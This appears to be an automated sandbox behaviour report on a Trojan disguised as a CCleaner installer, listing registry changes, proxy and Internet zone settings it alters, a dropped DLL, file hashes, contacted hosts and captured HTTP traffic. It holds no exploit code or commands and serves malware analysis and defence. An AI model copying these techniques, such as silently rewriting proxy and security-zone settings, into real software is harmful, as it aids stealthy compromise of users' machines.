[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000030B1]
"146" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000030DC]
"14E" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000577]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList]
"CurrentLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\146]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14A]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\149]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000055E1]
"155" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057C]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\152]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14B]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14D]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057C]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14C]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\150\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"1000000002B11" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\145]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000587]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000044D4]
"149" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000044D6]
"14B" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\151\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000030F2" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\146]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000580]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14A]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14F]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000030FC]
"153" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057A]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\153]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\150]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000586]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000582]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\150]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\154]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000581]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057D]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\146]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\153]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000055E3]
"154" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000580]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\151]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\155\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000055E1" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\155]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\147]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\154]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\1000000002B0E]
"14F" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000577]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14B]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\152]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\146\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000030B1" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\155]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000581]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14E]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000586]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14C]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\147\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"100000000302F" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\1000000002B11]
"150" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\152\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000030F3" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14F]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\155]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14C]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14B\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000044D6" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057B]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"ExceptionRecord" = "4D 4F 43 E0 01 00 00 00 00 00 00 00 6F D3 99 75"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\145]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\154]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000585]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\148\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"10000000044D3" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14D]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14E]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\148]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\147]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\149]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14F\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"1000000002B0E" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\145\Indexes\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}]
"100000000305C" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\149]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\151]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057B]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14F]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\100000000302F]
"147" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\151]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000583]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\148]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\152]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\153]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057F]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\154]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\149]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14B]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000588]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057F]
"ObjectId" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14D]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\147]
"_Usn_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\152]
"_ObjectId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\000000000000057E]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14B]
"_FileId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\14A]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\154]
"_ObjectLru_" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\LruList\0000000000000588]
"ObjectLru" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000044D5]
"14A" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\IndexTable\FileIdIndex-{f80abb43-5224-11e3-bc81-806e6f6e6963}\10000000044D3]
"148" = "Type: REG_QWORD, Length: 8"

[\REGISTRY\A\{DF823AE1-9139-11E6-A7F6-0050563BAEAC}\DefaultObjectStore\ObjectTable\146]
"_UsnJournalId_" = "Type: REG_QWORD, Length: 8"

The process GoogleCrashHandler.exe:3160 makes changes in the system registry.
The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Google\Update]
"uid"
"old-uid"

The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"2103" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1406" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Piriform\CCleaner]
"CheckTrialOffer" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1406" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1609" = "0"
"2103" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"2103" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Piriform\CCleaner]
"CookiesToSave" = "*.piriform.com|accounts.google.com|google.com|twitter.com|www.google.com"
"WipeFreeSpaceDrives" = "C:\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1406" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1406" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"2103" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2103" = "0"

[HKCU\Software\Piriform\CCleaner]
"UpdateKey" = "06/25/2017 01:22:06 PM"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Piriform\CCleaner]
"RunICS" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1406" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1609" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\d05091a5183a017c7e34c58cab581114_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Piriform\CCleaner]
"AutoICS"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Piriform\CCleaner]
"AutoUpdateNotificationExpiryTime"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process wermgr.exe:1872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168"

[HKCU\Software\Microsoft\Windows\Windows Error Reporting\Debug]
"StoreLocation" = "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_infocard.exe_8060ea5cf72f7ed4ea9dabaad12d7232cfb73317_cab_0b387168"

Dropped PE files

MD5 File path
7574cf2c64f35161ab1292e2f532aabf c:\Program Files\Common Files\System\symsrv.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Piriform Ltd
Product Name: CCleaner
Product Version: 5, 01, 00, 5075
Legal Copyright: Copyright (c) 2005-2014 Piriform Ltd
Legal Trademarks:
Original Filename: ccleaner.exe
Internal Name: ccleaner
File Version: 5, 01, 00, 5075
File Description: CCleaner
Comments: CCleaner
Language: Chinese (Traditional, Taiwan)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2863463 2863616 4.65186 469562718f52f5e7763065da31e33872
.rdata 2871296 791710 792064 3.10691 2d8ffa6aa62920197ccb6c7b47457ef3
.data 3665920 2470820 349696 2.73382 92e83b8a0f561a3cdd877591f979d2d5
.tls 6139904 2 512 0 bf619eac0cdf3f68d496ea9344137e8b
.rsrc 6144000 1199352 1199616 4.65468 2e8d941cf7b9a2ce081faa06587b8ae7
.reloc 7344128 276672 276992 4.01219 f992b8cde8ec492f481590ccdceede1b
.vmp0 7622656 1708032 507904 4.97361 0197ebd6c9c9289c2948c40bdbe5e2d3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://cdn.globalsigncdn.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH
hxxp://crl.globalsign.net/root.crl 198.41.215.183
hxxp://gpla1.wac.v2cdn.net/CRL/Omniroot2025.crl
hxxp://e8218.dscb1.akamaiedge.net/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc=
hxxp://clients.l.google.com/edgedl/release2/LJCVr0SsrEs/GoogleUpdateSetup.exe
hxxp://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= 23.46.123.27
hxxp://redirector.gvt1.com/edgedl/release2/LJCVr0SsrEs/GoogleUpdateSetup.exe 172.217.16.110
hxxp://cdp1.public-trust.com/CRL/Omniroot2025.crl 93.184.220.20
hxxp://ocsp.globalsign.com/rootr1/MEwwSjBIMEYwRDAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6+MgGqMQQUYHtmGkUNl8qJUC99BM00qP/8/UsCCwQAAAAAAURO8EJH 104.16.27.216
clients2.google.com 172.217.16.110
license.piriform.com 151.101.0.64
www.piriform.com 151.101.0.64
tools.google.com 172.217.16.110


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

HEAD /edgedl/release2/LJCVr0SsrEs/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
X-GoogleUpdate-Interactivity: bg
Host: redirector.gvt1.com


HTTP/1.1 302 Found
Date: Sun, 25 Jun 2017 10:23:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: hXXp://r1---sn-2puapox-ig3e.gvt1.com/edgedl/release2/LJCVr0SsrEs/GoogleUpdateSetup.exe?cms_redirect=yes&expire=1498400584&ip=194.242.



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEAKQll6RM0DNpmNM7zH3/Qc= HTTP/1.1
Cache-Control: max-age = 547348
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 19 Nov 2013 21:12:41 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.10.2
Content-Type: application/ocsp-response
Content-Length: 1664
content-transfer-encoding: binary
Cache-Control: max-age=433543, public, no-transform, must-revalidate
Last-Modified: Fri, 23 Jun 2017 10:47:50 GMT
